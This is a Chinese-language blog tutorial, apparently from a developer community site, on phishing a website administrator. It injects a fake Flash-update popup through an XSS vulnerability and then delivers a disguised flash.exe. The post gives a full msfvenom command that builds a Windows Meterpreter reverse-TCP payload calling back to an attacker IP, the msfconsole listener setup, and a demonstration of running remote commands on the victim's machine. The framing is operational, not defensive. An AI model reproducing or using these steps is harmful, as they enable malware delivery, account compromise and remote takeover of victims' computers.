xss-flash攻击钓鱼

1、在网站https://xssaq.com注册账号,并登录

2、在公共模块复制flash弹窗钓鱼的代码

3、在www下新建一个js文件,把代码复制进去

4、找到网站的xss漏洞,让管理员的页面引用我们的外部js文件

5、管理员页面执行了我们的代码

6、管理员一旦点击了立即升级,就进入了我们的圈套,我们想让他下载什么他就下载的是什么,下载东西的地方在我们的js文件里

7、为了管理员不容易发现我们的行为,我们把文件地址和文件名改为flash.exe,并在放js文件的地方新建一个flash.exe文件

8、此时当管理员点击立即升级时下载的就是我们的文件

当管理员下载这个文件后我们就可以控制它的电脑了,但是现在这个文件里还没有病毒,所以我们要制作病毒

9、打开kali制作病毒

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.19.133 LPORT=4444 -f exe > shell.exe
如果提示未找到命令的话那就以此输入这两条命令,回车
apt-get update
sudo apt-get install metasploit-framework

然后再输入病毒命令就可以了,这样我们可以看到在root里生成了一个shell.exe文件

10、把这个病毒文件拖到我们的网站上,并把病毒的名字改为flash的名字

11、此时,这个病毒就可以使用了,我们在kali里对自己的病毒进行监听,在kali里一条一条的运行下面的语句

msfconsole    //打开控制台
use exploit/multi/handler   //使用监听模块
set payload windows/x64/meterpreter/reverse_tcp    //使用Windows64的监听
set lhost kali的ip    //监听的地址
set lport 4444    //监听的端口
run   //运行
现在就是正在监听的状态

12、模拟管理员点击立即升级,下载我们的病毒

13、在kali里输入shell就可以执行命令了

14、比如,我们要打开它的计算器

当我输入calc时,这台计算机的计算器就被打开了
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值